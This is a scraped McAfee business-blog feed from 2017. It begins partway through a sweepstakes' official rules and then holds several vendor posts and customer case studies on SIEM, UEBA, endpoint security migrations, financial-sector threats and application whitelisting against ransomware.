License to Submission: By entering the Sweepstakes and providing your Submission in connection with the Sweepstakes, you hereby grant to Sponsor a perpetual, irrevocable, royalty-free, worldwide, nonexclusive license, (with the right to sublicense), to publish, reproduce, display, perform, distribute, adapt, edit, modify, translate, create derivative works based upon, and otherwise use and sublicense your Submission, or any portion thereof (including your name and likeness as shown and conveyed in the Submission), in connection with the Sweepstakes and for other advertising, marketing, and promotional purposes, and to incorporate Submissions, in whole or in part, into other works in any manner, form, media or technology now known or later developed.  Sponsor will have no obligation to publish or use or retain any Submission you submit or to return any such Submission to you.  You agree that it is your sole responsibility to obtain all permissions and releases necessary for the grant of the rights contained in this paragraph.  You agree to take, at Sponsor’s expense, any further action (including execution of affidavits, tax forms, and other documents) reasonably requested by Sponsor to effect, perfect or confirm Sponsor’s rights as set forth above in this paragraph.  You will not be entitled to compensation for any use by Sponsor, or its agents, licensees or assignees, of your Submission.

Winner List; Rules RequestFor a copy of the winner list, send a stamped, self-addressed, business-size envelope to 2821 Mission College Blvd., Santa Clara, CA 95054 for arrival after April 28, 2017 and before April 28, 2018 to the address listed above Attn: Rebrand Social RT to Win Sweepstakes.  To obtain a copy of these Official Rules, visit https://securingtomorrow.mcafee.com/business/help-us-celebrate-newmcafee-re-tweet-win/ or send a stamped, self-addressed business-size envelope to the address listed above Attn: Rebrand Social RT to Win Sweepstakes.  VT residents may omit return postage.

Intellectual Property Notice: McAfee is a registered trademark of McAfee, LLC.  The Sweepstakes and all accompanying materials are copyright © 2017 by McAfee, LLC.  All rights reserved.

Sponsor: McAfee, LLC 2821 Mission College Blvd., Santa Clara, CA 95054

The post Help Us Celebrate #newMcAfee Re-Tweet to Win! appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/help-us-celebrate-newmcafee-re-tweet-win/feed/ 3
Leveraging UEBA Capabilities in Your Existing SIEM https://securingtomorrow.mcafee.com/business/security-operations/leveraging-ueba-capabilities-existing-siem/ https://securingtomorrow.mcafee.com/business/security-operations/leveraging-ueba-capabilities-existing-siem/#respond Fri, 31 Mar 2017 19:00:15 +0000 https://securingtomorrow.mcafee.com/?p=70971 This blog post was written by Kristen Jacobsen. User and entity behavior analytics (UEBA) uses advanced analytics to track and flag suspicious behaviors of both users and assets, such as networked assets, sensors, databases, devices, and hosts. There are many reasons why UEBA is gaining traction as both an integrated tool with SIEM as well […]

The post Leveraging UEBA Capabilities in Your Existing SIEM appeared first on McAfee Blogs.

]]>
This blog post was written by Kristen Jacobsen.

User and entity behavior analytics (UEBA) uses advanced analytics to track and flag suspicious behaviors of both users and assets, such as networked assets, sensors, databases, devices, and hosts.
There are many reasons why UEBA is gaining traction as both an integrated tool with SIEM as well as a standalone solution. A few include:

  • Increasing concerns over insider threats, whether intentional or accidental.
  • The rise of credential theft.
  • The need to add additional context to SIEM and orchestration systems for more effective continuous monitoring, detection, and remediation.

Some SIEM vendors, like McAfee, not only deliver integrations with UEBA solutions, but also already include UEBA capabilities in their products. McAfee Enterprise Security Manager employs a combination of intelligent anomaly detection and user and entity specific rules, along with other correlation models, to perform many UEBA functions efficiently and effectively—right out of the box!

McAfee Enterprise Security Manager factors in anomalous behavior—including user activities—as part of its continuous monitoring and incident prioritization. User behaviors are incorporated into calculations of security and risk to help security teams identify and prioritize security events. Some of the user behaviors that McAfee Enterprise Security Manager detects as unusual activities include: creation of new accounts or account lockouts, possible data exfiltration behaviors (emailing sensitive data outside the network), an increase in traffic to business applications, and events like late-night logins from unexpected locations or simultaneous remote logins to multiple locations.

Security professionals agree that speed and accuracy is of the essence when it comes to detecting, analyzing, and triaging threats. McAfee Enterprise Security Manager addresses this requirement by using multiple types of correlations to gather, parse, and process the user behavior data it receives.

An additional component of the McAfee SIEM solution is the McAfee Advanced Correlation Engine, which is purpose-built to analyze huge volumes of data without impacting your SIEM’s performance. It performs four types of correlation—rule-based, risk-based, standard deviation, and historical—for a real-time look at threats initiated by users against high-value assets and sensitive data.

The post Leveraging UEBA Capabilities in Your Existing SIEM appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/leveraging-ueba-capabilities-existing-siem/feed/ 0
Currency and Performance Drive Multinational Conglomerate’s Migration to McAfee ENS https://securingtomorrow.mcafee.com/business/currency-performance-drive-multinational-conglomerates-migration-mcafee-ens/ https://securingtomorrow.mcafee.com/business/currency-performance-drive-multinational-conglomerates-migration-mcafee-ens/#respond Thu, 30 Mar 2017 14:00:11 +0000 https://securingtomorrow.mcafee.com/?p=70881 “Maintaining currency is one of our new driving forces,” says Dwayne Cyr, senior cyber security manager at Textron, a $13.4 billion aerospace, defense, and advanced technologies conglomerate that employs over 35,000 people worldwide. Textron is working diligently to stay ahead of cyber threats as well as provide a more leading-edge experience for its end users. For […]

The post Currency and Performance Drive Multinational Conglomerate’s Migration to McAfee ENS appeared first on McAfee Blogs.

]]>
“Maintaining currency is one of our new driving forces,” says Dwayne Cyr, senior cyber security manager at Textron, a $13.4 billion aerospace, defense, and advanced technologies conglomerate that employs over 35,000 people worldwide.

Textron is working diligently to stay ahead of cyber threats as well as provide a more leading-edge experience for its end users. For instance, with software releases occurring more frequently than in the past, the company has created a mechanism to simplify testing so that it can incorporate new releases more quickly.

The motivation to stay up to date with the latest improvements in technology, along with a desire for better scanning performance, led Textron to migrate as soon as it could to the new, more collaborative, more intelligent McAfee endpoint protection framework, McAfee Endpoint Security (ENS). “McAfee ENS has been heavily marketed as being a lot faster,” notes Cyr. “Our testing and some of our engineering communities definitely validated that.”

Textron first deployed McAfee ENS version 10.1, including migrating some Host Intrusion Prevention (HIPS) rules to the new ENS firewall. According to Cyr, the company is gearing up to deploy 10.2 across the extended enterprise in the near future.

Cyr describes his team’s experience with ENS thus far as “resoundingly positive.” He recalls only one issue after the migration to ENS—one of Textron’s applications looks an awful lot like a threat—but it was resolved quickly.

“The thing we’ve been really successful at is combing back our exclusions,” claims Cyr. “[With] the old anti-virus product you would have to exclude an entire directory [from virus scans]. [McAfee Endpoint Security] doesn’t have the same performance issues so you don’t need to exclude as much.”

Less exclusions means more complete coverage, which translates to a stronger security posture. Not having to manually set exclusions for scans also reduces the time that engineers on Cyr’s team have to spend tweaking endpoint protection.

Cyr’s advice for others migrating to McAfee ENS: “Take a good hard look at the way you deploy [McAfee VirusScan Enterprise] because there are a lot of behaviors that you’ve learned that no longer apply to [ENS].”

Besides endpoint protection, Textron relies on McAfee for on-premises and cloud-based web protection, via McAfee Web Gateway appliances and McAfee Web Gateway Cloud Service respectively. Since McAfee ENS and McAfee Web Gateway are able to communicate using the McAfee Data Exchange Layer (DXL) fabric, Textron has the capability to add other DXL-connected solutions as well as McAfee Threat Intelligence Exchange, which shares local and global threat information in near real time. Cyr views adding DXL and Threat Intelligence Exchange as very attractive because “by the time a file [that enters through the Internet] gets to the endpoint, we’ll have scanned it and remediated it.”

Get your questions answered by tweeting @McAfee.

The post Currency and Performance Drive Multinational Conglomerate’s Migration to McAfee ENS appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/currency-performance-drive-multinational-conglomerates-migration-mcafee-ens/feed/ 0
Widening Threat Surface and Security Gaps https://securingtomorrow.mcafee.com/business/widening-threat-surface-security-gaps/ https://securingtomorrow.mcafee.com/business/widening-threat-surface-security-gaps/#respond Tue, 28 Mar 2017 19:12:40 +0000 https://securingtomorrow.mcafee.com/?p=70813 This blog was written by Maneeza Malik. Digital transformation, the rise of mobile banking, ongoing migration of core banking services to the cloud and a shift towards an omni-banking model have all contributed to an overall wider threat landscape for financial institutions to monitor and manage. This is further exacerbated by the fact that financial institutions […]

The post Widening Threat Surface and Security Gaps appeared first on McAfee Blogs.

]]>
This blog was written by Maneeza Malik.

Digital transformation, the rise of mobile banking, ongoing migration of core banking services to the cloud and a shift towards an omni-banking model have all contributed to an overall wider threat landscape for financial institutions to monitor and manage. This is further exacerbated by the fact that financial institutions operate in a highly complex and interconnected financial ecosystem connecting thousands of entities, networks and users across the globe.

Petabytes of data, billions of messages and transactions flow across this interconnected system on a daily basis and make it a daunting task to monitor, detect and block anomalous activities, elusive threats and under-the-radar attacks in real-time.  , Cybercriminals have the potential to launch a large scale attack by infiltrating and exploiting one ‘weak link’ in this interconnected system, targeting multiple financial institutions in various geographies simultaneously.  This has vastly elevated the potential for risk of “systemic” consequences for the industry at large.

On top of that, financial institutions have the added burden of operating in an environment where system, process and security silos prevail.  With hundreds of disparate security tools deployed, they are constantly struggling to patch holes and close gaps in their threat defense lifecycle. Security teams are often overwhelmed with sifting through and prioritizing the vast amounts of alerts that each security tool is generating often with limited threat intelligence sharing  between the various tools in a cohesive and adaptive manner.

In a recent study issued by Morgan Stanley (1), it was reported that better security tools with tighter integration and automation are  needed. It suffices to say – as the financial services industry and world at large rapidly march towards further digital transformation, the challenge to bridge the security gaps will get increasingly difficult in an industry whose very “foundation” is built on an interconnected system — linking financial institutions, payment and settlement processors and various other entities including the 3rd party providers that financial institutions work with globally.

So now, the pressure is on everyone (and not just the top G20 financial institutions) to prevent cyberattacks at the scale we saw in in 2016 with the Bangladesh Bank, SWIFT, and the Federal Reserve Bank of NY. Or the Carbanak attack on multiple financial institutions resulting in nearly $1 billion in losses the year prior.

The path forward will require implementing multiple steps:

  • Implement ‘a unified threat defense security infrastructure’  —  one where financial institutions pivot from disparate security solutions that have created yet ‘another layer of silos’…in an already complex and fragmented technology landscape.  This means security solutions need to work in an integrated, automated and adaptive manner.
  • Adopt a communication fabric that is built on open standards, enabling your business to easily integrate the your disparate security solutions to create a cohesive and adaptive threat defense lifecycle. To do that, consider  a solution, such as McAfee Open DXL, that can help your institution share information easily across your security infrastructure.
  • Adopt greater collaboration practices across the industry (bringing in both the security vendor community as well as more banks, not just the top 100 or G20 banks).  This is a burden that needs to be carried by all and not just a few
  • The creation of hunter teams need to become more pervasive in the industry and a best practice (switching from reactive to proactive mode) for more about this read our paper on the big attacks from 2016 .
  • While the industry does not need or would welcome yet another regulation — this is one area where a global cybersecurity regulation is required.  This is not to penalize a handful of banks, but rather protect an interconnected ecosystem where hundreds and thousands of entities are connected to the financial system. The need for everyone to pursue the same set of guidelines and regulatory stipulations is needed.

The post Widening Threat Surface and Security Gaps appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/widening-threat-surface-security-gaps/feed/ 0
What Are You Sacrificing to Protect Your Endpoints? https://securingtomorrow.mcafee.com/business/sacrificing-protect-endpoints/ https://securingtomorrow.mcafee.com/business/sacrificing-protect-endpoints/#respond Mon, 20 Mar 2017 19:00:37 +0000 https://securingtomorrow.mcafee.com/?p=70508 This blog was written by Joakim Lialias. Pop quiz: What’s the right balance between user flexibility and endpoint security? It’s a trick question—there is no right answer. Or rather, there are as many answers as there are organizations. The “right” balance is a function of an organization’s culture, its approach to security, its level of […]

The post What Are You Sacrificing to Protect Your Endpoints? appeared first on McAfee Blogs.

]]>
This blog was written by Joakim Lialias.

Pop quiz: What’s the right balance between user flexibility and endpoint security?

It’s a trick question—there is no right answer. Or rather, there are as many answers as there are organizations. The “right” balance is a function of an organization’s culture, its approach to security, its level of in-house security expertise, and many other factors. No two businesses are the same.

A more useful approach is to look at security and flexibility as a continuum. On one end (call it “Total Control”), you can envision an organization that prioritizes endpoint protection above all else. Endpoints are locked down tight by default, with users restricted to doing only what is expressly allowed by organizational policy. On the other end (call it “Total Flexibility”), you have the opposite: employees have the freedom to do what they need to get their jobs done—install applications, open email attachments, visit external websites. Endpoints will be exposed to more threats, but the organization hopes its defenses will detect them before they can do too much damage.

Most organizations fall somewhere in the middle. But CISOs still find themselves weighing tough tradeoffs, especially when it comes to handling unknown files coming into the environment. Here again, there’s no “right” answer. But your endpoint security needs to be aligned with where you fall on that continuum. And in weighing the tradeoffs, make sure you’re not giving up the farm. 

Calculating “Costs” of Different Approaches

What exactly do organizations sacrifice when making these tradeoffs? Let’s start with an organization on the right-hand side of the continuum—say a business in consulting, advertising, or manufacturing. Your employees constantly collaborate with outside vendors and customers. Customer service and responsiveness are top priorities, so you can’t block every single unknown executable or hold up every email attachment for minutes at a time until it’s fully vetted. You’re confident your defenses will catch most of the bad stuff before it causes serious damage. But the sacrifice you’re making here is the first endpoint to get hit with a new threat—the “patient zero” infection. Cleaning up those patient zeros carries a cost that adds up quickly, as well as costs to users, whose endpoints are out of commission.

On the flip side, consider a financial or healthcare organization, or a government agency closer to the left-hand side. Your approach to unknown files is “block first, ask questions later.” Nothing executes on endpoints that hasn’t been expressly approved by IT. But there’s a cost here, too. By denying everything by default, you’ve sacrificed visibility. Your endpoint defenses effectively become a “black box.” You have no way to understand what’s attacking you, what vulnerabilities the malware is seeking to exploit, or how to beef up your defenses against that type of threat.

In both of these scenarios, the sacrifice is too great. No matter where you fall on the continuum, you ought to be able to secure patient zero while still learning from every interaction with potential threats. You should be able to implement endpoint security that’s informed by what’s happening outside your organization, and continually refined by what’s taking place within.

A Better Approach

To achieve a better balance, stop thinking about endpoint security as layers of protection that are either on or off. Rather, endpoint security should function more like a soundboard in a music studio. For some songs, you want to crank up the bass. For others, you want to emphasize the high end. There’s no need to choose between bass or treble—you can adjust different knobs to get the right mix for each song.

Your endpoint security should work the same way. You should have multiple layers of endpoint defenses at your disposal, with the ability to turn inspection and blocking at various layers up or down to best suit your organizational priorities.

When you start to think about endpoint security in this way, you can start using all the tools at your disposal in a smarter way. Because you can control how much you see, you know how much control you need to have. And wherever you fall on the continuum, you can decide what to allow or restrict on a more granular basis, while empowering your employees to be as productive as possible.

 Learn More

To find out how you can tune different layers of McAfee endpoint solutions to find the right balance for your organization, join us for a webinar “Busting the Malware Silver Bullet Myth.”

The post What Are You Sacrificing to Protect Your Endpoints? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/sacrificing-protect-endpoints/feed/ 0
Confidence in McAfee Endpoint Security Drives Widespread Adoption Across Australian School System https://securingtomorrow.mcafee.com/business/confidence-mcafee-endpoint-security-drives-widespread-adoption-across-australian-school-system/ https://securingtomorrow.mcafee.com/business/confidence-mcafee-endpoint-security-drives-widespread-adoption-across-australian-school-system/#respond Thu, 16 Mar 2017 15:00:23 +0000 https://securingtomorrow.mcafee.com/?p=70436 The 103 Catholic schools overseen by Catholic Education South Australia (CESA) can use whichever endpoint security they choose. They have the option to purchase endpoint protection at a per-user or per-node cost from a CESA team that designs and delivers school-centric technology services. But they are also free to turn to other solutions. In the […]

The post Confidence in McAfee Endpoint Security Drives Widespread Adoption Across Australian School System appeared first on McAfee Blogs.

]]>
The 103 Catholic schools overseen by Catholic Education South Australia (CESA) can use whichever endpoint security they choose. They have the option to purchase endpoint protection at a per-user or per-node cost from a CESA team that designs and delivers school-centric technology services. But they are also free to turn to other solutions.

In the past, only half of the 20,000 protectable endpoints in the region subscribed to the endpoint protection that the CESA services team provided. However, after the team switched endpoint protection to McAfee Endpoint Security (ENS) and the McAfee ePolicy Orchestrator® (ePO™) central management console, schools began signing up to receive the new endpoint protection.

According to Simon Sigré, senior network engineer and technical lead for the CESA technology services team, word spread quickly as site IT administrators and users of McAfee ENS were delighted with the improvement in protection and ease of management. Sigré also posted on the CESA Twitter feed every time ENS successfully thwarted a cyberattack. Within months, CESA had doubled the number of endpoints served to 20,000.

Sigré and the technology services team ultimately deployed McAfee ENS version 10.2 across 93 of the 103 sites, easily migrating 4,000 nodes per day. At an additional site, the team is piloting ENS version 10.5, which boasts additional improvements in performance and Real Protect machine learning and behavioral analysis detection capabilities. Sigré looks forward to upgrading all the desktops with ENS 10.2 to ENS 10.5 in the near future to take advantage of these additional enhancements.

Easier Jobs, Greater Visibility and Coverage, and Superior Detection

Why did CESA schools overwhelmingly sign up and pay to be protected by McAfee Endpoint Security? Two main reasons.

First, McAfee ENS provides superior detection and blocking. Sigré points to the ability to build behavioral rules to adapt to unique use cases as one way that ENS has strengthened CESA’s defense. For instance, over a span of nine months, the McAfee ENS behavioral detection configurations designed by the team stopped infections from 32 separate phishing campaigns masquerading as AGL (Australian Gas & Light utility) bills or Australian Post parcel collection notices. ENS prevented countless ransomware infection attempts from these campaigns by preventing them from executing their initial JavaScript, potentially saving days that would have been spent in remediation.

Second, McAfee ENS makes site IT administrators’ jobs easier. Authorized administrators can log in to McAfee ePO anytime, whether or not they are within the CESA network, to see pertinent security information they need to do their job as efficiently as possible. In addition, the CESA School Support team, (another as-a-service offering provided by CESA), can continually monitor the security posture of the 70 sites it supports.

Furthermore, greater visibility and coverage enabled by McAfee ePO makes the entire school system safer. “By consolidating many separate consoles to one centralized console, we now have multiple sets of eyes looking at the same console, whether onsite or on the services team,” explains Sigré. “It’s a collective effort. As a result, we no longer have nodes falling through the cracks.”

“We haven’t had a CryptoLocker outbreak in six months,” concludes Sigré. “With McAfee Endpoint Security, we have more visibility, more coverage, and more customer confidence than we have had in 12 years.”

To read the full case study of CESA’s experience with McAfee Endpoint Security and McAfee ePolicy Orchestrator, click here. Get your questions answered by tweeting @McAfee.

The post Confidence in McAfee Endpoint Security Drives Widespread Adoption Across Australian School System appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/confidence-mcafee-endpoint-security-drives-widespread-adoption-across-australian-school-system/feed/ 0
Please Vote: Fourth Annual SANS IR Survey Wants You! https://securingtomorrow.mcafee.com/business/security-operations/please-vote-fourth-annual-sans-ir-survey-wants/ https://securingtomorrow.mcafee.com/business/security-operations/please-vote-fourth-annual-sans-ir-survey-wants/#respond Mon, 13 Mar 2017 15:00:59 +0000 https://securingtomorrow.mcafee.com/?p=70346 This blog was written by Barbara Kay. Past survey findings have helped us understand key trends such as the hurdles holding back success, the evolution of SOC maturity, the data being targeted, use of automation, and priority investments for improving results. This market is changing quickly, and surveys are an excellent way to benchmark your […]

The post Please Vote: Fourth Annual SANS IR Survey Wants You! appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

Past survey findings have helped us understand key trends such as the hurdles holding back success, the evolution of SOC maturity, the data being targeted, use of automation, and priority investments for improving results. This market is changing quickly, and surveys are an excellent way to benchmark your experience against your peers and identify opportunities. Whether you want to commiserate or collaborate, data makes the conversation more compelling.

Below are two of my favorite charts from last year’s survey, with my prognostications for this year’s survey. I’ll review my predictions after the 2017 survey is published and grade myself!

What’s causing the breaches?

  • Malware will continue to dominate given malware’s contribution to so many phases of so many forms of attack, and the ubiquity of toolkits and tool sharing as well as ransomware.
  • Access—oriented attacks (unauthorized, insider breach, privilege escalation, and data breach) should remain a top concern, and cloud services and shadow IT should continue to make these attacks both likely and challenging. Silver bullets like UBA won’t change this dynamic much.
  • Network-based attacks will continue to decline as the formal perimeter focuses on the data center rather than the entire enterprise estate.
  • I’m curious if insider breach will show an uptick rather than continued decline, as it has been trending higher in industry conversations recently.

How well are we automating our remediation?

  • Last year’s data showed a (to me) disappointing degree of manual remediation still, despite the availability of simple automation for basic remediation processes through assorted tools. But this year I think (and other surveys validate) that the industry has turned the corner and is actively pursuing “safe” automation. I certainly expect to see greater adoption of automation as we attempt to survive the expanding range and volume of incidents.
  • Automated quarantine (the top response) or taking offline are totally in scope for automation today. I’d like to see a big jump in the use of automation there. Identifying similar systems, removing malicious artifacts without rebuilding the machine, and updating policies and rules are also easily done now. Here’s hoping we see all of these make a big shift to automation.

Thanks for your help capturing the evidence of change in incident response.

The post Please Vote: Fourth Annual SANS IR Survey Wants You! appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/please-vote-fourth-annual-sans-ir-survey-wants/feed/ 0
SIEM is your Analyst’s Best Technology Partner https://securingtomorrow.mcafee.com/business/security-operations/siem-analysts-best-technology-partner/ https://securingtomorrow.mcafee.com/business/security-operations/siem-analysts-best-technology-partner/#respond Fri, 03 Mar 2017 01:00:21 +0000 https://securingtomorrow.mcafee.com/?p=70100 This blog post was written by Karl Klaessig. For the average security analyst, it’s no secret that their days are overloaded with more “hair on fire” moments than “Zen” moments. The 2016 SANS Incident Response Survey paints a clear and sobering picture of the demands being placed on security analysts. The survey lists, in order, […]

The post SIEM is your Analyst’s Best Technology Partner appeared first on McAfee Blogs.

]]>
This blog post was written by Karl Klaessig.

For the average security analyst, it’s no secret that their days are overloaded with more “hair on fire” moments than “Zen” moments.

The 2016 SANS Incident Response Survey paints a clear and sobering picture of the demands being placed on security analysts. The survey lists, in order, the following impediments to effective incident response:

  • Lack of staffing and proper skills
  • Not enough visibility across systems and domains
  • Lack of budget for needed tools or technology
  • Processes and owners not clearly defined
  • Organizational siloes
  • Difficulties in detecting sophisticated attacks

All of the above results in:

  • Further weight on your analyst’s shoulders
  • Too much dwell time in mean-time-to-remediate (MTTR)

So we get it. You’ve got too many unknowns, not enough relevant insight, and functions and technologies tripping over each other trying to help sort out what is really going on!  Your analysts need a technology security partner to help detect, investigate and remediate today’s never-ending threat sources.

As the threats and responsibilities have expanded, the role of the security information and event management (SIEM) solution has morphed into one of the greatest assets an analyst has, becoming the Swiss Army Knife of incident response and orchestration. Further, you reach to your SIEM for advanced analytics including user and behavior analysis, real-time monitoring, and data and application monitoring. The problem, as Barbara Kay outlines in her blog, “Eating an Elephant: How the ESM 10 UX team reenergized SecOps,” is the amount of information that the average analyst has to retain as she or he swivels from incident response, to advanced threat management, to user monitoring.

So as your SOC makes the move to more proactive threat management and predictive, contextual analysis and orchestration, we’re evolving McAfee Enterprise Security Manager (ESM) to reduce the cognitive strain, and guide and automate more of the routine tasks, such as watchlist management, incident tracking and advanced correlation rule set-up, so that you can focus on the critical decision-making responsibilities. McAfee ESM 10.0 is an important step in that evolution.

As more changes are rolled out, we want to make it easier for you to find the information you need and to stay informed. So we are providing some new communications tools for you beginning this month.

We have heard from customer surveys and from calls to McAfee Support Services that you need more guidance on where to go for more information. So we have responded with a new SIEM Information Center page – your one-stop shop for all things SIEM. On this page, you’ll find the latest and greatest advice from our SIEM subject matter experts, as well as access to shared wisdom from our SIEM user community. To make such invaluable content easier to find, we are categorizing all of our SIEM content according to the commonly recognized SIEM capability categories and use cases that our customers reference.

As a member of our McAfee ESM user community, you will be interested in the McAfee SIEM Focus newsletter that debuts this month. For those of you who subscribe to the McAfee Support Notification Service, you know how valuable and timely the ProTips, Weekly Roundup, and monthly SNS Digest emails can be. Because of the fast-moving and complex environment in which security analysts and other SIEM users operate, we want to provide you with a dedicated newsletter featuring practical use cases, demonstrations, and other in-depth, roll-up-your-sleeves examples of how to get the most from the McAfee ESM solution.

Finally, don’t miss out on the action on our SIEM Community site. We encourage you to sign up and participate with our 219 active users. We are all learning from each other. Join today, stay connected and discover for yourself how Together is Power.

The post SIEM is your Analyst’s Best Technology Partner appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/siem-analysts-best-technology-partner/feed/ 0
School District Defends 125,000 Desktops Against Tomorrow’s Cyberthreats by Migrating to McAfee Endpoint Security https://securingtomorrow.mcafee.com/business/school-district-defends-125000-desktops-tomorrows-cyberthreats-migrating-mcafee-endpoint-security/ https://securingtomorrow.mcafee.com/business/school-district-defends-125000-desktops-tomorrows-cyberthreats-migrating-mcafee-endpoint-security/#respond Thu, 02 Mar 2017 17:10:02 +0000 https://securingtomorrow.mcafee.com/?p=70060 “When you move from a tiny apartment, it doesn’t take long and you can use a Honda Civic,” says Desktop Security Manager Mehdi Harandi, who oversees endpoint security at Fairfax County Public Schools, the 11th largest school district in the U.S. “But when you try to move from a five-bedroom house, it takes a lot […]

The post School District Defends 125,000 Desktops Against Tomorrow’s Cyberthreats by Migrating to McAfee Endpoint Security appeared first on McAfee Blogs.

]]>
“When you move from a tiny apartment, it doesn’t take long and you can use a Honda Civic,” says Desktop Security Manager Mehdi Harandi, who oversees endpoint security at Fairfax County Public Schools, the 11th largest school district in the U.S. “But when you try to move from a five-bedroom house, it takes a lot more time and the Civic just won’t cut it anymore; you need an 18-wheeler.”

Harandi uses this analogy to describe the impact of the exponential growth in files and data stored on the school district’s desktops upon malware scanning. With so much data on PCs these days, anti-virus scans simply never finished full scans on some of the desktops, and, in numerous cases, interrupted user productivity.

The need for an “18-wheeler”—that is, much faster, more efficient scanning—drove Harandi to migrate the school district’s 125,000 desktops from McAfee Endpoint Threat Prevention to McAfee Endpoint Security (ENS), the new more collaborative, more intelligent endpoint protection framework which also provides dramatically improved performance.

Using the migration assistant tool available through McAfee ePO, Harandi migrated the 125,000 endpoints to McAfee ENS version 10.5. “Some of our security policies apply to the McAfee Endpoint Security Threat Prevention module, some to its Firewall module, and some to its Web Control module, so the McAfee Endpoint Security migration tool helped immensely in translating from old platform to new,” explains Harandi. “It did an excellent job.”

Harandi also notes that the migration tool helped him understand the new endpoint platform better as well. “It brings you up to speed quickly and fast forwards the migration process,” he says. “It easily saved me a month if not more.”

Benefits Far Exceed Faster Performance and Happier Users

With McAfee ENS protecting all the desktops belonging to Fairfax County Public Schools, scan time is no longer a problem. “My phone used to ring off the hook on Tuesdays [full scan day] and now it doesn’t” Harandi says. In addition, because scans are performed when desktops are idle, endless scans that seriously impacted user experience are a thing of the past.

But that’s not all. Harandi notes that upgrading to McAfee ENS has definitely improved Fairfax County Public Schools’ ability to detect malware and block it. For instance, since implementing McAfee ENS, Web-generated malware infections entering the environment through users’ laptops when they are outside the network have been substantially reduced.

In addition, the modular design of McAfee ENS makes Harandi’s job easier and saves him a lot of time. As an example, he cites a recent conflict between an application on a user’s desktop and the anti-virus scanning operation:

“In the past, I had to disable antivirus protection completely and leave the desktop unprotected until the patch became available,” he says. “But with McAfee Endpoint Security, I was able to find exactly which module was causing the issue, temporarily disable just that module, and find the conflict within less than one hour. In the past, finding such a conflict could easily have taken eight to 20 hours.”

Furthermore, McAfee ENS saves Harandi time, because, he says, “I can trust it is working…With McAfee Endpoint Security, I set it up once and then can forget about it 99 percent of the time…Management doesn’t have to hear about endpoint security at all.”

Thanks to all these benefits, Fairfax County Public Schools is in a much better position to face the tomorrow’s cyberthreats—with just one person managing desktop security. “With McAfee Endpoint Security, we now have endpoint protection that positions us well for the future,” concludes Harandi.

To read the complete case study with more details on Fairfax County Public Schools’ implementation of McAfee ENS [and how Harandi almost singlehandedly manages endpoint security], click here. Get your questions answered by tweeting @McAfee_Business.

The post School District Defends 125,000 Desktops Against Tomorrow’s Cyberthreats by Migrating to McAfee Endpoint Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/school-district-defends-125000-desktops-tomorrows-cyberthreats-migrating-mcafee-endpoint-security/feed/ 0
Stopping Ransomware and Polymorphic Malware https://securingtomorrow.mcafee.com/business/stopping-ransomware-polymorphic-malware/ https://securingtomorrow.mcafee.com/business/stopping-ransomware-polymorphic-malware/#respond Wed, 01 Mar 2017 14:00:12 +0000 https://securingtomorrow.mcafee.com/?p=68829 This blog post was written by Teresa Wingfield. One of the biggest threats to businesses today is crypto ransomware, where critical data is encrypted so that users cannot access it and a ransom is demanded to provide access. Easy availability of open-source code and drag and drop platforms to create ransomware have accelerated creation of […]

The post Stopping Ransomware and Polymorphic Malware appeared first on McAfee Blogs.

]]>
This blog post was written by Teresa Wingfield.

One of the biggest threats to businesses today is crypto ransomware, where critical data is encrypted so that users cannot access it and a ransom is demanded to provide access. Easy availability of open-source code and drag and drop platforms to create ransomware have accelerated creation of new ransomware variants and help script novices create their own ransomware.  Use of anonymous currency for payment such as Bitcoin makes it difficult to follow the money trail and track down criminals.

Anatomy of Ransomware

Malware needs an attack vector to establish its presence on an endpoint. Attack vectors for ransomware are standard techniques used by other malware including watering hole attacks, zero-day exploits and spear-phishing.

After a successful exploit, ransomware drops and executes a malicious binary on the system. This binary then searches and encrypts valuable files.  Once files are encrypted, ransomware prompts the user for a ransom payment to decrypt files, or they will be lost forever if a data backup is unavailable.

Preventing Ransomware Infection with McAfee Application Control

Typically, cutting-edge malware like ransomware are polymorphic by design which allows it to easily bypass traditional signature-based security based on a file hash. However, ransomware can be prevented by creating a list of trusted applications and allowing only these to run. This technology is exemplified by McAfee Application Control and its two-layered defense mechanism:

  • Memory protection: Protects from memory exploits used to drop the malware binary. This helps provide protection from zero-day exploits.
  •  Whitelisting: Prevents execution of binaries coming from an untrusted source. This protects against social attacks such as spear phishing when a user manually downloads malware and executes it or when a payload is dropped on a system after a user visits a compromised site or opens a compromised file.

McAfee Application Control stops file-based malware from execution and has a configurable framework to prevent execution of scripts by interpreters such as Python, Perl, and Ruby. New binaries or scripts are prevented from execution unless they arrive through a trusted mechanism.

Because McAfee Application Control does not depend on a signature, it is a reliable option to block file malware without daily signature-based updates. Using signature-less technology, McAfee Application Control can also block polymorphic and advanced persistent threats.

How McAfee Application Control Works

During installation, McAfee Application Control scans the entire system to identify executables, such as .exes, installed applications and scripts. These executables are whitelisted locally so that each system has its own unique local whitelist. When new ransomware enters the system and tries to execute, it will be unable to do so since it’s not part of the local whitelist.

 

 

During installation, McAfee Application Control identifies executables and reports them back to McAfee ePO as inventory items. You can analyze these executables centrally from ePO and view their reputation based on McAfee® Threat Intelligence Exchange and McAfee® Global Threat Intelligence to ban execution of bad binaries across your environment. You can use a file hash to find further information about unknown binaries from other reputation sources as well.

 

 

 

 

Learn More

For more information on McAfee Application Control, visit http://www.mcafee.com/in/products/application-control.aspx.

The post Stopping Ransomware and Polymorphic Malware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/stopping-ransomware-polymorphic-malware/feed/ 0
